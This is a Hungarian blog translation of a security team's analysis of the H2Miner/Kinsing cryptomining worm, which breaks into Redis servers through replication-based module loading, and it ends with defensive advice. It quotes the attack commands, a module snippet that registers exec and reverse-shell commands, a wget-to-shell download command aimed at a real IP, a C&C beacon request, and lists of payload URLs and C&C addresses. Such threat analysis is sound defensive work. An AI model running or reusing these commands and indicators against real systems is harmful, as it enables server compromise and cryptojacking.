Egy nappal ezelőtt a projektem egyik szerverét megtámadta egy hasonló féreg. A „mi volt ez?” kérdésre keresve a választ? Találtam egy nagyszerű cikket az Alibaba Cloud Security csapatától. Mivel ezt a cikket nem találtam a Habrén, úgy döntöttem, hogy lefordítom neked <3
Belépés
Nemrég az Alibaba Cloud biztonsági csapata felfedezte a H2Miner hirtelen kitörését. Az ilyen típusú rosszindulatú férgek a Redis engedélyének hiányát vagy gyenge jelszavait használják átjáróként a rendszerekhez, majd szinkronizálja saját rosszindulatú modulját a slave-el a master-slave szinkronizálás révén, végül letölti ezt a rosszindulatú modult a megtámadott gépre, és végrehajtja a rosszindulatú utasítás.
Korábban a rendszerei elleni támadásokat elsősorban ütemezett feladatokat vagy SSH-kulcsokat tartalmazó módszerrel hajtották végre, amelyeket a támadó Redisbe való bejelentkezése után írtak a számítógépére. Szerencsére ezt a módszert nem lehet gyakran használni az engedélyek ellenőrzésével kapcsolatos problémák vagy a rendszerverziók különbözősége miatt. Ez a rosszindulatú modul betöltésének módja azonban közvetlenül végrehajthatja a támadó parancsait, vagy hozzáférhet a héjhoz, ami veszélyes a rendszerre.
Az interneten üzemeltetett Redis szerverek nagy száma (közel 1 millió) miatt az Alibaba Cloud biztonsági csapata barátságos emlékeztetőül azt javasolja a felhasználóknak, hogy ne osszák meg online a Redis-t, és rendszeresen ellenőrizzék jelszavaik erősségét és azt, hogy nem került-e veszélybe. gyors kiválasztás.
H2Miner
A H2Miner egy bányászati botnet Linux-alapú rendszerek számára, amely számos módon behatolhat a rendszerbe, beleértve a Hadoop-fonal, a Docker és a Redis távoli parancsvégrehajtási (RCE) sebezhetőségeinek hiányát. A botnet úgy működik, hogy rosszindulatú szkripteket és rosszindulatú programokat tölt le az adatok kiaknázására, a támadás vízszintes kiterjesztésére, valamint a parancs- és irányítási (C&C) kommunikáció fenntartására.
Redis RCE
A témával kapcsolatos ismereteit Pavel Toporkov osztotta meg a 2018-as ZeroNights rendezvényen. A 4.0-s verzió után a Redis támogatja a beépülő modulok betöltési funkcióját, amely lehetővé teszi a felhasználók számára, hogy a C-vel lefordított fájlokat betöltsék a Redisbe, hogy bizonyos Redis-parancsokat hajtsanak végre. Ez a funkció, bár hasznos, tartalmaz egy biztonsági rést, amelyben mester-szolga módban a fájlok teljes újraszinkronizálással szinkronizálhatók a slave-el. Ezt a támadó felhasználhatja rosszindulatú fájlok átvitelére. Az átvitel befejezése után a támadók betöltik a modult a megtámadott Redis-példányra, és végrehajtanak bármilyen parancsot.
Rosszindulatú programok féregelemzése
Nemrég az Alibaba Cloud biztonsági csapata felfedezte, hogy a H2Miner rosszindulatú bányászcsoport mérete hirtelen drámaian megnőtt. Az elemzés szerint a támadás előfordulásának általános folyamata a következő:
A H2Miner az RCE Redis-t használja egy teljes értékű támadáshoz. A támadók először a nem védett Redis-kiszolgálókat vagy gyenge jelszavakkal rendelkező szervereket támadják meg.
Ezután a parancsot használják config set dbfilename red2.so a fájlnév megváltoztatásához. Ezt követően a támadók végrehajtják a parancsot slaveof a master-slave replikációs gazdagép címének beállításához.
Amikor a megtámadott Redis-példány mester-szolga kapcsolatot létesít a támadó tulajdonában lévő rosszindulatú Redis-szel, a támadó a fullresync paranccsal elküldi a fertőzött modult a fájlok szinkronizálására. A red2.so fájl ezután letöltődik a megtámadott gépre. A támadók ezután a ./red2.so betöltő modult használják a so fájl betöltésére. A modul parancsokat hajthat végre a támadótól, vagy fordított kapcsolatot (hátsó ajtót) kezdeményezhet, hogy hozzáférjen a megtámadott géphez.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Egy rosszindulatú parancs végrehajtása után, mint pl / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, a támadó visszaállítja a biztonsági mentési fájl nevét, és eltávolítja a rendszermodult a nyomok eltávolításához. A red2.so fájl azonban továbbra is a megtámadott gépen marad. A felhasználóknak azt tanácsoljuk, hogy figyeljenek az ilyen gyanús fájlok jelenlétére a Redis-példány mappájában.
Amellett, hogy megölett néhány rosszindulatú folyamatot az erőforrások ellopása érdekében, a támadó egy rosszindulatú szkriptet követett rosszindulatú bináris fájlok letöltésével és futtatásával. . Ez azt jelenti, hogy a kinsing-et tartalmazó folyamatnév vagy könyvtárnév a gazdagépen azt jelezheti, hogy a gépet megfertőzte ez a vírus.
A visszafejtési eredmények szerint a kártevő elsősorban a következő funkciókat látja el:
- Fájlok feltöltése és végrehajtása
- Bányászati
- A C&C kommunikáció fenntartása és a támadóparancsok végrehajtása
Használja a masscan-t külső szkenneléshez, hogy kiterjessze befolyását. Ezenkívül a C&C szerver IP-címe a programban keményen kódolva van, és a támadott gazdagép HTTP kérések segítségével kommunikál a C&C kommunikációs szerverrel, ahol a zombi (kompromittált szerver) információ azonosításra kerül a HTTP fejlécben.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Egyéb támadási módszerek
A féreg által használt címek és hivatkozások
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tanács
Először is, a Redis ne legyen elérhető az internetről, és erős jelszóval kell védeni. Az is fontos, hogy a kliensek ellenőrizzék, hogy nincs-e red2.so fájl a Redis könyvtárban, és nincs-e „kinsing” a fájl/folyamatnévben a gazdagépen.
Forrás: will.com